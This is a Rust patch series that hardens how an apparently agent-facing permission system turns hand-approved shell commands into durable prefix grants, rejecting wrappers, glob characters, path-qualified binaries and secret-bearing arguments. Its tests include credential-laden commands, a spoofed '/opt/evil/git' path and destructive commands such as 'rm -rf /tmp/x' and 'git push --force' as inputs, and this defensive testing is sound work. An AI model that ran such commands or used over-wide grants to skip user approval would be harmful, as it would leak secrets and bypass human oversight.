             let prefix = derive_prefix(cmd).unwrap_or_else(|| panic!("no prefix for {cmd}"));
             let mut store = GrantStore::ephemeral();
@@ -681,27 +687,58 @@ mod tests {
         }
     }
 
-    /// The spelling that gets persisted has to be the spelling the
-    /// matcher will see. A path-qualified binary reduced to its base name
-    /// produced a grant that never fired — the user answered "always" and
-    /// was asked again on the identical next call.
+    /// The path an executable is invoked through is user-controlled and
+    /// can itself carry a credential, so a path-qualified spelling is
+    /// never folded into a plaintext prefix.
     #[test]
-    fn a_path_qualified_binary_keeps_its_grant() {
-        let cmd = "/usr/bin/git status";
-        let prefix = derive_prefix(cmd).expect("a prefix");
-        let mut store = GrantStore::ephemeral();
-        store.insert_prefix(&prefix, "ctx", "").unwrap();
-        assert!(
-            store.allows_prefix(cmd, "ctx"),
-            "the identical command prompted again after `always`"
-        );
-        assert!(
-            store.allows_prefix("/usr/bin/git status --porcelain", "ctx"),
-            "the grant did not extend to the same command with flags"
-        );
-        // Still bound to that spelling — it does not leak to another
-        // binary that merely shares the base name.
-        assert!(!store.allows_prefix("/opt/evil/git status", "ctx"));
+    fn derive_prefix_refuses_path_qualified_binaries() {
+        for cmd in [
+            "/tmp/AKIAIOSFODNN7EXAMPLE/git status",
+            "/usr/bin/git status",
+            "/usr/local/bin/cargo test",
+            "./git status",
+            "../bin/git status",
+            "~/bin/git status",
+        ] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "a user-controlled executable path reached the prefix for {cmd}"
+            );
+        }
+        // The bare name is still offered.
+        assert_eq!(derive_prefix("git status").as_deref(), Some("git status"));
+    }
+
+    /// The whole invariant in one assertion: every byte of an offered
+    /// prefix comes from the static table, so nothing a user or a model
+    /// controls can reach the grant file.
+    #[test]
+    fn an_offered_prefix_is_built_only_from_table_literals() {
+        let commands = [
+            "git status --porcelain",
+            "git 0123456789abcdef0123456789abcdef",
+            "/tmp/AKIAIOSFODNN7EXAMPLE/git status",
+            "cargo build --release",
+            "curl https://token@example.com",
+            "echo 0123456789abcdef0123456789abcdef",
+            "kubectl get pods -n secret-namespace",
+            "docker run --env AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI",
+        ];
+        for cmd in commands {
+            let Some(prefix) = derive_prefix(cmd) else {
+                continue;
+            };
+            let (binary, sub) = prefix.split_once(' ').expect("two halves");
+            let (tool, subs) = table_entry(binary).unwrap_or_else(|| {
+                panic!("prefix `{prefix}` for {cmd} names a binary outside the table")
+            });
+            assert_eq!(tool, binary);
+            assert!(
+                subs.contains(&sub),
+                "prefix `{prefix}` for {cmd} carries a subcommand outside the table"
+            );
+        }
     }
 
     /// A project holding only prefix grants is still a project with
@@ -1293,126 +1330,366 @@ impl PrefixEntry {
     }
 }
 
-/// Executables whose first positional argument is a subcommand keyword
-/// drawn from a set the tool itself defines — `git status`,
-/// `cargo build`, `docker compose`.
+/// The complete set of prefixes this feature will ever offer: a tool
+/// name paired with the subcommand keywords that tool defines.
 ///
-/// This is the semantic knowledge that a character-shape test cannot
-/// supply. `echo 0123456789abcdef0123456789abcdef` has an argument
-/// shaped exactly like a subcommand, and an API key has that shape too;
-/// only knowing that `echo` does not take subcommands, while `git` does,
-/// separates the two. Without it, pressing `P` could write a secret into
-/// the config directory, which AGENTS.md forbids outright.
+/// Both halves of every persisted prefix are read out of this table, so
+/// a grant file can only ever contain string literals from this source
+/// file. That is the invariant, and it is what keeps the feature inside
+/// AGENTS.md's rule that credentials must never be written to the config
+/// directory. Earlier revisions asked whether a token *looked* like a
+/// subcommand, and identifier-shaped secrets look exactly like one:
+/// `git 0123456789abcdef0123456789abcdef` and
+/// `/tmp/AKIAIOSFODNN7EXAMPLE/git status` both pass every character-shape
+/// test that can be written. Recognising the token instead of its shape
+/// is the only check that holds.
 ///
-/// This is **not** an allowlist of "probably fine" tools of the kind
-/// AGENTS.md rules out. Nothing here is allowed to run, and nothing
-/// skips a prompt: the list only limits which commands may be *offered*
-/// a durable grant after the user has already approved this call by
-/// hand. An unlisted tool is simply never offered one — it can still be
-/// approved with `[y]`, `[a]` or `[A]`. Adding an entry widens nothing
-/// on its own; it lets a human be asked one fewer question about a tool
-/// whose argument grammar is known.
+/// The binary is matched by exact equality, never by base name, so a
+/// path-qualified spelling is refused rather than embedded: the path is
+/// user-controlled and can itself carry a credential.
 ///
-/// Deliberately excludes wrappers (`env`, `sudo`, `timeout`, `nohup`):
-/// their first argument is another command, so a prefix over it would
-/// cover every command that wrapper can reach.
-const SUBCOMMAND_TOOLS: &[&str] = &[
-    "apt",
-    "apt-get",
-    "aws",
-    "az",
-    "brew",
-    "bun",
-    "bundle",
-    "cargo",
-    "deno",
-    "dnf",
-    "docker",
-    "dotnet",
-    "flutter",
-    "gcloud",
-    "gem",
-    "gh",
-    "git",
-    "go",
-    "helm",
-    "kubectl",
-    "nix",
-    "npm",
-    "pip",
-    "pip3",
-    "pnpm",
-    "podman",
-    "poetry",
-    "rustup",
-    "systemctl",
-    "terraform",
-    "uv",
-    "yarn",
+/// This is **not** the "probably fine" tool allowlist AGENTS.md rules
+/// out for `auto_decision`. Nothing here is allowed to run and nothing
+/// skips a prompt: the table only limits which commands may be *offered*
+/// a durable grant after the user has already approved that call by
+/// hand. Anything absent is simply never offered one and is still
+/// approvable with `[y]`, `[a]` or `[A]`. Adding an entry widens nothing
+/// by itself.
+///
+/// Tools whose first argument is a service or resource name rather than
+/// a fixed keyword (`aws`, `gcloud`, `az`) are deliberately absent —
+/// their argument space is not a closed set, so it cannot be recognised,
+/// only shape-tested, which is what failed. Wrappers (`env`, `sudo`,
+/// `timeout`) are absent for the same reason: their first argument is
+/// another command.
+const SUBCOMMAND_TOOLS: &[(&str, &[&str])] = &[
+    (
+        "cargo",
+        &[
+            "add",
+            "bench",
+            "build",
+            "check",
+            "clean",
+            "clippy",
+            "doc",
+            "fetch",
+            "fix",
+            "fmt",
+            "install",
+            "metadata",
+            "nextest",
+            "publish",
+            "remove",
+            "run",
+            "rustc",
+            "search",
+            "test",
+            "tree",
+            "uninstall",
+            "update",
+            "vendor",
+            "version",
+        ],
+    ),
+    (
+        "docker",
+        &[
+            "attach",
+            "build",
+            "buildx",
+            "commit",
+            "compose",
+            "config",
+            "container",
+            "context",
+            "cp",
+            "create",
+            "diff",
+            "events",
+            "exec",
+            "export",
+            "history",
+            "image",
+            "images",
+            "import",
+            "info",
+            "inspect",
+            "kill",
+            "load",
+            "login",
+            "logout",
+            "logs",
+            "network",
+            "pause",
+            "port",
+            "ps",
+            "pull",
+            "push",
+            "rename",
+            "restart",
+            "rm",
+            "rmi",
+            "run",
+            "save",
+            "search",
+            "start",
+            "stats",
+            "stop",
+            "system",
+            "tag",
+            "top",
+            "unpause",
+            "update",
+            "version",
+            "volume",
+            "wait",
+        ],
+    ),
+    (
+        "gh",
+        &[
+            "alias",
+            "api",
+            "auth",
+            "browse",
+            "cache",
+            "codespace",
+            "config",
+            "extension",
+            "gist",
+            "issue",
+            "label",
+            "org",
+            "pr",
+            "project",
+            "release",
+            "repo",
+            "ruleset",
+            "run",
+            "search",
+            "secret",
+            "status",
+            "variable",
+            "workflow",
+        ],
+    ),
+    (
+        "git",
+        &[
+            "add",
+            "am",
+            "apply",
+            "archive",
+            "bisect",
+            "blame",
+            "branch",
+            "checkout",
+            "cherry-pick",
+            "clean",
+            "clone",
+            "commit",
+            "config",
+            "describe",
+            "diff",
+            "fetch",
+            "fsck",
+            "gc",
+            "grep",
+            "init",
+            "log",
+            "ls-files",
+            "ls-remote",
+            "merge",
+            "mv",
+            "notes",
+            "pull",
+            "push",
+            "rebase",
+            "reflog",
+            "remote",
+            "reset",
+            "restore",
+            "rev-list",
+            "rev-parse",
+            "revert",
+            "rm",
+            "shortlog",
+            "show",
+            "sparse-checkout",
+            "stash",
+            "status",
+            "submodule",
+            "switch",
+            "symbolic-ref",
+            "tag",
+            "worktree",
+        ],
+    ),
+    (
+        "go",
+        &[
+            "bug", "build", "clean", "doc", "env", "fix", "fmt", "generate", "get", "install",
+            "list", "mod", "run", "test", "tool", "version", "vet", "work",
+        ],
+    ),
+    (
+        "kubectl",
+        &[
+            "annotate",
+            "api-resources",
+            "api-versions",
+            "apply",
+            "attach",
+            "auth",
+            "autoscale",
+            "certificate",
+            "cluster-info",
+            "config",
+            "cordon",
+            "cp",
+            "create",
+            "debug",
+            "delete",
+            "describe",
+            "diff",
+            "drain",
+            "edit",
+            "events",
+            "exec",
+            "explain",
+            "expose",
+            "get",
+            "kustomize",
+            "label",
+            "logs",
+            "patch",
+            "port-forward",
+            "proxy",
+            "replace",
+            "rollout",
+            "run",
+            "scale",
+            "set",
+            "taint",
+            "top",
+            "uncordon",
+            "version",
+            "wait",
+        ],
+    ),
+    (
+        "npm",
+        &[
+            "audit",
+            "ci",
+            "dedupe",
+            "exec",
+            "init",
+            "install",
+            "link",
+            "ls",
+            "outdated",
+            "pack",
+            "ping",
+            "prune",
+            "publish",
+            "rebuild",
+            "run",
+            "start",
+            "stop",
+            "test",
+            "uninstall",
+            "update",
+            "version",
+            "view",
+            "why",
+        ],
+    ),
+    (
+        "pnpm",
+        &[
+            "add", "audit", "build", "dlx", "exec", "install", "link", "list", "outdated", "prune",
+            "publish", "rebuild", "remove", "run", "start", "store", "test", "update", "why",
+        ],
+    ),
+    (
+        "systemctl",
+        &[
+            "cat",
+            "daemon-reload",
+            "disable",
+            "edit",
+            "enable",
+            "is-active",
+            "is-enabled",
+            "is-failed",
+            "kill",
+            "list-timers",
+            "list-units",
+            "mask",
+            "reload",
+            "reset-failed",
+            "restart",
+            "show",
+            "start",
+            "status",
+            "stop",
+            "unmask",
+        ],
+    ),
+    (
+        "terraform",
+        &[
+            "apply",
+            "console",
+            "destroy",
+            "fmt",
+            "force-unlock",
+            "get",
+            "graph",
+            "import",
+            "init",
+            "login",
+            "logout",
+            "output",
+            "plan",
+            "providers",
+            "refresh",
+            "show",
+            "state",
+            "taint",
+            "test",
+            "untaint",
+            "validate",
+            "version",
+            "workspace",
+        ],
+    ),
+    (
+        "yarn",
+        &[
+            "add", "audit", "bin", "cache", "config", "dlx", "info", "init", "install", "link",
+            "list", "outdated", "pack", "publish", "remove", "run", "start", "test", "up",
+            "upgrade", "version", "why",
+        ],
+    ),
 ];
 
-/// True when `binary`'s first positional argument is a subcommand rather
-/// than data. Judged on the base name, so `/usr/bin/git` counts as
-/// `git` — while the prefix itself keeps the full spelling it was
-/// invoked with, which is what the matcher will see.
-fn dispatches_subcommands(binary: &str) -> bool {
-    let name = crate::tools::bash_parse::base_name(binary);
-    SUBCOMMAND_TOOLS.contains(&name.as_str())
-}
-
-/// Tokens that may be persisted as the argument half of a prefix.
+/// The table entry for `binary` — its own `&'static str` name and the
+/// subcommands it defines — or `None` when it is not a tool this feature
+/// offers prefixes for.
 ///
-/// A subcommand is a short identifier the tool itself defines — `status`,
-/// `build`, `rev-parse`. Anything else in that position is *data*: a URL,
-/// a path, a filename, a `key=value`. Persisting data would write
-/// arbitrary command-line content — including a credential-bearing URL
-/// like `https://token@example.com` — into the config directory, which
-/// AGENTS.md forbids outright, and would also record a prefix so specific
-/// it could never match twice.
-///
-/// Deliberately narrow: alphanumerics, `-` and `_` only. That excludes
-/// `/`, `.`, `:`, `@`, `=`, `~`, `%`, every quote and every non-ASCII
-/// character, so no separator, control or bidi character can ride into
-/// the stored prefix. Unrecognized shapes fail closed — see
-/// [`derive_prefix`].
-fn is_subcommand_token(tok: &str) -> bool {
-    !tok.is_empty()
-        && tok.len() <= 32
-        && tok.starts_with(|c: char| c.is_ascii_alphanumeric())
-        && tok
-            .chars()
-            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
-}
-
-/// True when `tok` may be persisted and rendered as an executable name.
-///
-/// Binaries legitimately carry `.`, `/` and `~` (`./deploy.sh`), so they
-/// cannot be held to [`is_subcommand_token`]. Three things disqualify
-/// them:
-///
-/// * **Glob metacharacters.** A stored prefix is a *pattern* to
-///   [`crate::permissions::matches_shell_command`], not a literal. `*`
-///   and `?` would therefore widen the grant past the command it was
-///   derived from, and a prefix of only `*` is short-circuited by that
-///   matcher as universal — approving `./\* --version` would suppress
-///   the prompt for every later command in the same context.
-/// * **Quoting and expansion characters.** They mean the stored spelling
-///   is not the spelling the matcher will see in the command text.
-/// * **Invisible characters.** Control, bidi and zero-width characters
-///   make the persisted bytes differ from the painted ones.
-fn is_literal_binary_token(tok: &str) -> bool {
-    !tok.is_empty()
-        && !tok.chars().any(|c| {
-            matches!(c, '*' | '?' | '\'' | '"' | '\\' | '$' | '`')
-                || c.is_control()
-                || c.is_whitespace()
-                || matches!(c,
-                    '\u{200B}'..='\u{200F}'
-                    | '\u{202A}'..='\u{202E}'
-                    | '\u{2060}'..='\u{2064}'
-                    | '\u{2066}'..='\u{2069}'
-                    | '\u{FEFF}')
-        })
+/// Exact match on the whole token: a path-qualified spelling is a
+/// different, user-controlled string and is refused rather than reduced
+/// to its base name. The name is returned from the table rather than
+/// echoed back from the argument, so the caller cannot accidentally
+/// build a prefix out of anything but literals.
+fn table_entry(binary: &str) -> Option<(&'static str, &'static [&'static str])> {
+    SUBCOMMAND_TOOLS
+        .iter()
+        .find(|(tool, _)| *tool == binary)
+        .map(|(tool, subs)| (*tool, *subs))
 }
 
 /// True when `prefix` authorizes `command`, ignoring context.
@@ -1450,17 +1727,20 @@ fn prefix_covers(prefix: &str, command: &str) -> bool {
 ///
 /// * Commands the gate cannot reason about — multiple invocations,
 ///   substitutions, subshells, redirection, assignment.
-/// * A binary that does not take subcommands at all
-///   ([`SUBCOMMAND_TOOLS`]), including every command wrapper: `env git
-///   status` would otherwise offer `env git`, covering `env git push`.
-/// * A first non-flag argument that is data rather than a subcommand
-///   ([`is_subcommand_token`]): `curl https://token@host` must not put a
-///   credential in the config directory.
-/// * A binary that is not a literal ([`is_literal_binary_token`]).
+/// * A binary that is not, token for token, one of the tools in
+///   [`SUBCOMMAND_TOOLS`]. That excludes every command wrapper (`env git
+///   status` would otherwise offer `env git`, covering `env git push`)
+///   and every path-qualified spelling, whose path is user-controlled and
+///   can itself carry a credential (`/tmp/AKIA…/git status`).
+/// * A first non-flag argument that is not a subcommand that tool
+///   actually defines. Not a token that *looks* like one: an API key
+///   looks exactly like one, and `curl https://token@host` or
+///   `git 0123456789abcdef…` must not put a secret in the config
+///   directory.
 /// * A prefix that does not, in the end, cover the very command it was
-///   derived from ([`prefix_covers`]) — which is what stops a
-///   path-qualified or quoted spelling from being offered as a grant
-///   that would never match.
+///   derived from ([`prefix_covers`]) — which is what stops a quoted or
+///   oddly spaced spelling from being offered as a grant that would
+///   never match.
 pub fn derive_prefix(command: &str) -> Option<String> {
     let parsed = crate::tools::bash_parse::parse_bash(command)?;
     if parsed.has_parse_error
@@ -1491,26 +1771,16 @@ pub fn derive_prefix(command: &str) -> Option<String> {
     let mut tokens = invocation
         .iter()
         .map(|t| crate::tools::bash_parse::unquote_token(t));
-    // Tokens keep their full text — the binary is *not* reduced to its
-    // base name. Matching compares the stored prefix against the raw
-    // command text, so `/usr/bin/git status` reduced to `git status`
-    // would be persisted as a grant that never matches the call it came
-    // from. The same reasoning rules out base-naming arguments, which
-    // additionally hid the separators that mark an argument as data.
-    let binary = tokens.next()?;
-    if !is_literal_binary_token(&binary) {
-        return None;
-    }
-    // The one question a character-shape test cannot answer: is the next
-    // token a subcommand, or is it data?
-    if !dispatches_subcommands(&binary) {
-        return None;
-    }
+    // Both halves are looked up, never inspected. Whatever comes back is
+    // a `&'static str` from the table above, so the string this function
+    // returns — and therefore everything that can reach the grant file —
+    // is built only from literals in this source file. No spelling the
+    // user or the model controls can ride along, which is the property
+    // that keeps a credential out of the config directory.
+    let (binary, subcommands) = table_entry(&tokens.next()?)?;
     // Both halves are required: see the bare-binary note above.
-    let sub = tokens.find(|t| !t.starts_with('-'))?;
-    if !is_subcommand_token(&sub) {
-        return None;
-    }
+    let answered = tokens.find(|t| !t.starts_with('-'))?;
+    let sub = subcommands.iter().find(|known| **known == answered)?;
     let prefix = format!("{binary} {sub}");
     // Last gate: what is offered has to be what will later be honoured.
     // Any spelling the matcher would not recognise — quoting the parser

--- a/crates/lib/src/permissions/grants.rs
+++ b/crates/lib/src/permissions/grants.rs
@@ -448,13 +448,74 @@ mod tests {
             derive_prefix("cargo build --release").as_deref(),
             Some("cargo build")
         );
-        // No subcommand: the binary alone.
-        assert_eq!(derive_prefix("ls -la").as_deref(), Some("ls"));
-        // Path-qualified binaries reduce to their name.
+        // A path-qualified binary keeps its spelling. Reducing it to
+        // `git status` would persist a grant that never matches the
+        // command it came from, because matching sees the raw text.
         assert_eq!(
             derive_prefix("/usr/bin/git status").as_deref(),
-            Some("git status")
+            Some("/usr/bin/git status")
         );
+    }
+
+    /// The bare binary is never offered, with or without flags. The
+    /// matcher goes on to test `{prefix} *`, so a `git` grant would cover
+    /// `git push --force` — one approval turning into "never ask about
+    /// git again".
+    #[test]
+    fn derive_prefix_never_offers_a_bare_binary() {
+        for cmd in ["git --version", "ls -la", "ls", "npm", "df -h"] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "offered a bare-binary prefix for {cmd}"
+            );
+        }
+
+        // What that would have cost, had it been offered.
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("git", "ctx", "").unwrap();
+        assert!(
+            store.allows_prefix("git push --force", "ctx"),
+            "precondition: a bare-binary grant really does cover everything"
+        );
+    }
+
+    /// A stored prefix is a *pattern* to the matcher, not a literal. A
+    /// glob character in the executable name would widen the grant past
+    /// the command it was derived from, and a prefix of only `*` is
+    /// short-circuited as universal — one approval suppressing every
+    /// later prompt in the same context.
+    #[test]
+    fn derive_prefix_refuses_glob_metacharacters() {
+        for cmd in [
+            r"./\* --version",
+            r"./\* status",
+            r"'*' status",
+            r"\? status",
+            "./ru?ner build",
+            "./run*er build",
+        ] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "a glob metacharacter reached the offered prefix for {cmd}"
+            );
+        }
+    }
+
+    /// The universal-pattern short-circuit is what makes the rule above
+    /// load-bearing: had `*` been derivable, it would have authorized
+    /// every command in the context.
+    #[test]
+    fn a_glob_prefix_would_have_been_universal() {
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("*", "ctx", "").unwrap();
+        assert!(
+            store.allows_prefix("rm -rf /tmp/x", "ctx"),
+            "precondition: `*` is treated as universal by the matcher"
+        );
+        // …which is why nothing can derive it.
+        assert_eq!(derive_prefix(r"./\* --version"), None);
     }
 
     /// Never propose a prefix for something the gate cannot reason
@@ -505,7 +566,7 @@ mod tests {
     /// `curl <url>` as `curl <url>` may never be resolved by offering the
     /// bare binary, which would approve every future use of that tool.
     #[test]
-    fn derive_prefix_does_not_widen_to_the_bare_binary() {
+    fn derive_prefix_does_not_widen_to_the_bare_binary_for_data_arguments() {
         assert_eq!(derive_prefix("curl https://example.com/a"), None);
         // The same binary with a real subcommand still works, and a
         // later credential-bearing call is not covered by it.
@@ -538,7 +599,14 @@ mod tests {
     /// silently does nothing.
     #[test]
     fn an_offered_prefix_covers_the_command_it_came_from() {
-        for cmd in ["git status --porcelain", "cargo build --release", "ls -la"] {
+        for cmd in [
+            "git status --porcelain",
+            "cargo build --release",
+            "/usr/bin/git status",
+            "./deploy.sh staging",
+            "npm run build",
+            "docker compose up",
+        ] {
             let prefix = derive_prefix(cmd).unwrap_or_else(|| panic!("no prefix for {cmd}"));
             let mut store = GrantStore::ephemeral();
             store.insert_prefix(&prefix, "ctx", "").unwrap();
@@ -547,6 +615,29 @@ mod tests {
                 "prefix `{prefix}` did not cover its own command {cmd}"
             );
         }
+    }
+
+    /// The spelling that gets persisted has to be the spelling the
+    /// matcher will see. A path-qualified binary reduced to its base name
+    /// produced a grant that never fired — the user answered "always" and
+    /// was asked again on the identical next call.
+    #[test]
+    fn a_path_qualified_binary_keeps_its_grant() {
+        let cmd = "/usr/bin/git status";
+        let prefix = derive_prefix(cmd).expect("a prefix");
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix(&prefix, "ctx", "").unwrap();
+        assert!(
+            store.allows_prefix(cmd, "ctx"),
+            "the identical command prompted again after `always`"
+        );
+        assert!(
+            store.allows_prefix("/usr/bin/git status --porcelain", "ctx"),
+            "the grant did not extend to the same command with flags"
+        );
+        // Still bound to that spelling — it does not leak to another
+        // binary that merely shares the base name.
+        assert!(!store.allows_prefix("/opt/evil/git status", "ctx"));
     }
 
     /// A project holding only prefix grants is still a project with
@@ -1162,15 +1253,27 @@ fn is_subcommand_token(tok: &str) -> bool {
             .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
 }
 
-/// True when `tok` is safe to persist and to render as an executable
-/// name. Binaries legitimately carry `.`, `/` and `~` (`./deploy.sh`), so
-/// they cannot be held to [`is_subcommand_token`]; what they must not
-/// carry is anything that makes the stored bytes differ from the painted
-/// ones — control characters, bidi overrides, zero-width joiners.
-fn is_displayable_binary(tok: &str) -> bool {
+/// True when `tok` may be persisted and rendered as an executable name.
+///
+/// Binaries legitimately carry `.`, `/` and `~` (`./deploy.sh`), so they
+/// cannot be held to [`is_subcommand_token`]. Three things disqualify
+/// them:
+///
+/// * **Glob metacharacters.** A stored prefix is a *pattern* to
+///   [`crate::permissions::matches_shell_command`], not a literal. `*`
+///   and `?` would therefore widen the grant past the command it was
+///   derived from, and a prefix of only `*` is short-circuited by that
+///   matcher as universal — approving `./\* --version` would suppress
+///   the prompt for every later command in the same context.
+/// * **Quoting and expansion characters.** They mean the stored spelling
+///   is not the spelling the matcher will see in the command text.
+/// * **Invisible characters.** Control, bidi and zero-width characters
+///   make the persisted bytes differ from the painted ones.
+fn is_literal_binary_token(tok: &str) -> bool {
     !tok.is_empty()
         && !tok.chars().any(|c| {
-            c.is_control()
+            matches!(c, '*' | '?' | '\'' | '"' | '\\' | '$' | '`')
+                || c.is_control()
                 || c.is_whitespace()
                 || matches!(c,
                     '\u{200B}'..='\u{200F}'
@@ -1181,23 +1284,49 @@ fn is_displayable_binary(tok: &str) -> bool {
         })
 }
 
+/// True when `prefix` authorizes `command`, ignoring context.
+///
+/// Shared by [`derive_prefix`] and [`GrantStore::allows_prefix`] so that
+/// what is offered and what is later honoured can never drift apart —
+/// an offered prefix that does not match its own command is a grant that
+/// silently does nothing.
+///
+/// Two patterns, not one `{prefix}*`: a trailing glob would make
+/// `git status` cover `git statusx`, which is a different binary
+/// invocation entirely. The prefix has to end on a token boundary —
+/// either the whole invocation, or the invocation up to a space.
+fn prefix_covers(prefix: &str, command: &str) -> bool {
+    crate::permissions::matches_shell_command(prefix, command, /*widening*/ true)
+        || crate::permissions::matches_shell_command(
+            &format!("{prefix} *"),
+            command,
+            /*widening*/ true,
+        )
+}
+
 /// Propose the prefix to offer for `command`: the binary plus its first
-/// non-flag argument.
+/// non-flag argument, and nothing else.
 ///
-/// `git status --porcelain` proposes `git status`, not `git`. Offering
-/// the bare binary would turn "don't ask about `git status` again" into
-/// "never ask about git again", including `git push --force`. Offering
-/// the whole line would never match twice.
+/// `git status --porcelain` proposes `git status`. Both halves must be
+/// there. The bare binary is **never** offered — not for `git`, not for
+/// the flag-only `git --version` — because `allows_prefix` goes on to
+/// test `{prefix} *`, so a `git` grant would cover `git push --force`.
+/// Offering the whole line instead would never match twice.
 ///
-/// Returns `None` when the command is anything the gate cannot reason
-/// about — multiple invocations, substitutions, redirection — because a
-/// prefix over an unanalysable command is not a prefix over anything.
+/// Returns `None`, offering nothing, in every case it cannot vouch for.
+/// The user still has `[y]`/`[a]`/`[A]`; only the durable widening is
+/// withheld.
 ///
-/// Also returns `None` when that first non-flag argument is data rather
-/// than a subcommand ([`is_subcommand_token`]). `curl https://token@host`
-/// must not put a credential in the config directory, and widening to the
-/// bare binary instead — "never ask about `curl` again" — would be worse
-/// than asking. Nothing is offered; `[y]`/`[a]`/`[A]` still are.
+/// * Commands the gate cannot reason about — multiple invocations,
+///   substitutions, subshells, redirection, assignment.
+/// * A first non-flag argument that is data rather than a subcommand
+///   ([`is_subcommand_token`]): `curl https://token@host` must not put a
+///   credential in the config directory.
+/// * A binary that is not a literal ([`is_literal_binary_token`]).
+/// * A prefix that does not, in the end, cover the very command it was
+///   derived from ([`prefix_covers`]) — which is what stops a
+///   path-qualified or quoted spelling from being offered as a grant
+///   that would never match.
 pub fn derive_prefix(command: &str) -> Option<String> {
     let parsed = crate::tools::bash_parse::parse_bash(command)?;
     if parsed.has_parse_error
@@ -1218,24 +1347,27 @@ pub fn derive_prefix(command: &str) -> Option<String> {
     let mut tokens = invocation
         .iter()
         .map(|t| crate::tools::bash_parse::unquote_token(t));
-    // Only the binary is reduced to its base name: `/usr/bin/git` and
-    // `git` are the same tool. Arguments keep their full text, because
-    // base-naming them would both mangle the prefix past matching
-    // (`ls /usr/bin` → `ls bin`, which matches neither) and hide the
-    // separators that mark an argument as data.
-    let binary = crate::tools::bash_parse::base_name(&tokens.next()?);
-    if !is_displayable_binary(&binary) {
+    // Tokens keep their full text — the binary is *not* reduced to its
+    // base name. Matching compares the stored prefix against the raw
+    // command text, so `/usr/bin/git status` reduced to `git status`
+    // would be persisted as a grant that never matches the call it came
+    // from. The same reasoning rules out base-naming arguments, which
+    // additionally hid the separators that mark an argument as data.
+    let binary = tokens.next()?;
+    if !is_literal_binary_token(&binary) {
         return None;
     }
-    match tokens.find(|t| !t.starts_with('-')) {
-        Some(sub) if is_subcommand_token(&sub) => Some(format!("{binary} {sub}")),
-        // A positional argument that is not a subcommand is data. Fail
-        // closed rather than persist it or widen to the bare binary.
-        Some(_) => None,
-        // No positional argument at all: the binary is the whole command,
-        // so a prefix over it grants no more than the call being approved.
-        None => Some(binary),
+    // Both halves are required: see the bare-binary note above.
+    let sub = tokens.find(|t| !t.starts_with('-'))?;
+    if !is_subcommand_token(&sub) {
+        return None;
     }
+    let prefix = format!("{binary} {sub}");
+    // Last gate: what is offered has to be what will later be honoured.
+    // Any spelling the matcher would not recognise — quoting the parser
+    // stripped, odd spacing — is caught here rather than persisted as a
+    // grant that silently does nothing.
+    prefix_covers(&prefix, command).then_some(prefix)
 }
 
 impl GrantStore {
@@ -1258,20 +1390,7 @@ impl GrantStore {
             if e.context != context {
                 return false;
             }
-            // Two patterns, not one `{prefix}*`: a trailing glob would
-            // make `git status` cover `git statusx`, which is a
-            // different binary invocation entirely. The prefix has to
-            // end on a token boundary — either the whole invocation, or
-            // the invocation up to a space.
-            let exact = crate::permissions::matches_shell_command(
-                &e.prefix, command, /*widening*/ true,
-            );
-            let with_args = crate::permissions::matches_shell_command(
-                &format!("{} *", e.prefix),
-                command,
-                /*widening*/ true,
-            );
-            exact || with_args
+            prefix_covers(&e.prefix, command)
         })
     }
 

--- a/crates/lib/src/permissions/grants.rs
+++ b/crates/lib/src/permissions/grants.rs
@@ -492,8 +492,10 @@ mod tests {
             r"./\* status",
             r"'*' status",
             r"\? status",
-            "./ru?ner build",
-            "./run*er build",
+            // Path-qualified spellings of a tool that IS listed, so the
+            // glob rule is what rejects these rather than the tool list.
+            "/usr/*/git status",
+            "/usr/bin/gi?/git status",
         ] {
             assert_eq!(
                 derive_prefix(cmd),
@@ -501,6 +503,68 @@ mod tests {
                 "a glob metacharacter reached the offered prefix for {cmd}"
             );
         }
+    }
+
+    /// A wrapper's first argument is another command, not a subcommand.
+    /// `env git status` offering `env git` would cover
+    /// `env git push --force` — the bare-binary widening, one token
+    /// along.
+    #[test]
+    fn derive_prefix_refuses_command_wrappers() {
+        for cmd in [
+            "env git status",
+            "env -u PATH git status",
+            "command git status",
+            "nohup git status",
+            "setsid git status",
+            "sudo git status",
+            "timeout 5 git status",
+            "nice git status",
+            "xargs git status",
+        ] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "offered a prefix over a wrapper for {cmd}"
+            );
+        }
+
+        // What that would have cost.
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("env git", "ctx", "").unwrap();
+        assert!(
+            store.allows_prefix("env git push --force", "ctx"),
+            "precondition: a wrapper prefix really does reach every subcommand"
+        );
+    }
+
+    /// A character-shape test cannot tell a subcommand from data: an API
+    /// key is shaped exactly like one. Only knowing which tools take
+    /// subcommands keeps a secret out of the config directory.
+    #[test]
+    fn derive_prefix_refuses_tools_that_take_no_subcommand() {
+        for cmd in [
+            // Reads as a subcommand by shape; is in fact a secret.
+            "echo 0123456789abcdef0123456789abcdef",
+            "export AKIAIOSFODNN7EXAMPLE",
+            "base64 c2VjcmV0dmFsdWU",
+            "./deploy.sh staging",
+            "python manage.py",
+            "node server.js",
+        ] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "offered a prefix carrying an arbitrary argument for {cmd}"
+            );
+        }
+
+        // The listed tools still work, path-qualified or not.
+        assert_eq!(derive_prefix("git status").as_deref(), Some("git status"));
+        assert_eq!(
+            derive_prefix("/usr/local/bin/cargo test --lib").as_deref(),
+            Some("/usr/local/bin/cargo test")
+        );
     }
 
     /// The universal-pattern short-circuit is what makes the rule above
@@ -603,9 +667,9 @@ mod tests {
             "git status --porcelain",
             "cargo build --release",
             "/usr/bin/git status",
-            "./deploy.sh staging",
             "npm run build",
             "docker compose up",
+            "kubectl get pods",
         ] {
             let prefix = derive_prefix(cmd).unwrap_or_else(|| panic!("no prefix for {cmd}"));
             let mut store = GrantStore::ephemeral();
@@ -1229,6 +1293,73 @@ impl PrefixEntry {
     }
 }
 
+/// Executables whose first positional argument is a subcommand keyword
+/// drawn from a set the tool itself defines — `git status`,
+/// `cargo build`, `docker compose`.
+///
+/// This is the semantic knowledge that a character-shape test cannot
+/// supply. `echo 0123456789abcdef0123456789abcdef` has an argument
+/// shaped exactly like a subcommand, and an API key has that shape too;
